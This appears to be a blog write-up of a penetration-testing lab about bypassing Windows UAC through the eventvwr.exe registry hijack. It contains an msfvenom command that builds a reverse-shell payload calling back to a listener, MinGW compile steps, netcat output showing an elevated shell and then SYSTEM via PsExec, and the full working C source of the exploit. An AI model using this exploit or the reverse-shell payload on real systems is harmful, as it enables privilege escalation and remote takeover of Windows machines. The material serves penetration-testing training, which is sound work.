Bypassing default UAC settings manually c++

Go here:

Bypassing default UAC settings manuallyIvan's IT learning blog

msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=172.50.50.50 LPORT=4444-f exe -o reverse_4444.exe

A writeup of how the exploit works is found here with a Powershell script, but in the comments, someone posted a C version. I tested it confirm the C exploit works so let’s run through that. This exploit works on Windows 7, 8 and 10. Before using the exploit, it helps to ensure that eventvwr.exe exists and is set to autoelevate to High integrity.

C:\BypassUAC>where /r C:\windows eventvwr.exe
where /r C:\windows eventvwr.exe
C:\Windows\System32\eventvwr.exe
C:\Windows\SysWOW64\eventvwr.exe
C:\Windows\winsxs\amd64_eventviewersettings_31bf3856ad364e35_6.1.7600.16385_none_50ecc9ae1d642aa9\eventvwr.exe
C:\Windows\winsxs\wow64_eventviewersettings_31bf3856ad364e35_6.1.7600.16385_none_5b41740051c4eca4\eventvwr.exe

C:\BypassUAC>strings64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate
strings64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate
        [autoElevate]true[/autoElevate]

For the above, I used strings.exe by Sysinternals which is the same as the Linux tool. The page even says this program is backwards compatible with Win 95. Amazing. As always, pardon the square brackets.

Now just need to change these lines in the exploit

1234	/*GetCurrentDirectory(MAX_PATH, curPath);strcat(curPath, "\\foobar.exe");*/

Specifically uncomment them and and change foobar.exe to the name of whatever program payload we want to run at High integrity. The exploit needs to be in the same folder as the payload. In this case it’ll be

12	GetCurrentDirectory(MAX_PATH, curPath);strcat(curPath, "\\reverse_4444.exe");

Now we need to compile it for the appropriate OS architecture. The target system is x64 Windows, so we need MinGW on Kali to compile it

root@Kali:~/PTP/Post Exploitation/Bypass UAC Lab 15# x86_64-w64-mingw32-gcc eventvwr-bypassuac.c -o eventvwr-bypassuac-64.exe
root@Kali:~/PTP/Post Exploitation/Bypass UAC Lab 15# file eventvwr-bypassuac-64.exe 
eventvwr-bypassuac-64.exe: PE32+ executable (console) x86-64, for MS Windows

Now just set up our netcat listener and run the compiled exploit.

C:\BypassUAC>eventvwr-bypassuac-64.exe
eventvwr-bypassuac-64.exe

At netcat listener

root@Kali:~/PTP/Post Exploitation/Bypass UAC Lab 15# rlwrap -r nc -nlvp 4444
listening on [any] 4444 ...
connect to [172.50.50.50] from (UNKNOWN) [172.50.50.20] 49164
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami & whoami /priv
whoami & whoami /priv
els-win7\els

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Disabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled

Wow, see the difference? Suddenly a whole host of other privileges appear though we are still the same admin. This is a High integrity shell. Now PsExec will work.

C:\BypassUAC>PsExec64.exe -i -accepteula -d -s C:\BypassUAC\reverse_3333.exe
PsExec64.exe -i -accepteula -d -s C:\BypassUAC\reverse_3333.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Starting C:\BypassUAC\reverse_3333.exe on ELS-WIN7...
C:\BypassUAC\reverse_3333.exe started on ELS-WIN7 with process ID 2244.

At listener

root@Kali:~/PTP/Post Exploitation/Bypass UAC Lab 15# rlwrap -r nc -nlvp 3333
listening on [any] 3333 ...
connect to [172.50.50.50] from (UNKNOWN) [172.50.50.20] 49167
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami && whoami /priv
whoami && whoami /priv
nt authority\system

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled 
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled 
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Enabled 
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled 
SeCreatePagefilePrivilege       Create a pagefile                         Enabled 
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled 
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeAuditPrivilege                Generate security audits                  Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled 
SeTimeZonePrivilege             Change the time zone                      Enabled 
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled 

Great. We now have SYSTEM. Now if you get errors about PSEXEC service, run tasklist and see if you can taskkill whatever PSEXEC service is running. Otherwise it should work.

eventvwr-bypassuac.c

/*
*https://raw.githubusercontent.com/turbo/zero2hero/master/main.c
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Pretty standard code to recursively nuke a Reg Key
 */

int RegDelnodeRecurse (LPTSTR lpSubKey) {
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize = MAX_PATH;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);

    if (lResult == ERROR_SUCCESS) return 1;

    lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);

    if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;

    lpEnd    = lpSubKey + lstrlen(lpSubKey);
    *lpEnd++ = '\\';
    *lpEnd   = '\0';

    if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
        do {
            strcpy(lpEnd, szName);
            if (!RegDelnodeRecurse(lpSubKey)) break;
            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
        } while (lResult == ERROR_SUCCESS);
    }

    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey(hKey);

	return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}

/*
 * Wrapper for above
 */

int RegDelnode() {
    TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
    return RegDelnodeRecurse(szDelKey);
}

void __c_exploitUAC() {
	char curPath[MAX_PATH], evtVwr[MAX_PATH];
	HKEY attackKey;
	SHELLEXECUTEINFO exInfo;

	/*
	curPath is the command you want to elevate.
	Below is an example that shows how to elevate
	foobar.exe sitting in the same path as this
	program.
	*/

	/*
	GetCurrentDirectory(MAX_PATH, curPath);
	strcat(curPath, "\\foobar.exe");
	*/

	sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));

	if(!RegDelnode()) return;
	if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;

	RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));

	exInfo.lpVerb       = "open";
	exInfo.lpFile       = evtVwr;
	exInfo.nShow        = 0;
	exInfo.fMask        = SEE_MASK_NOCLOSEPROCESS;
	exInfo.cbSize       = sizeof(SHELLEXECUTEINFO);
	exInfo.hwnd         = 0;
	exInfo.lpParameters = 0;
	exInfo.lpDirectory  = 0;
	exInfo.hInstApp     = 0;

	ShellExecuteEx(&exInfo);

	Sleep(5000);

	TerminateProcess(exInfo.hProcess, 0);

	RegCloseKey(attackKey);
	RegDelnode();
}

int main(int argc, char *argv[]) {
	__c_exploitUAC();
	return 0;
}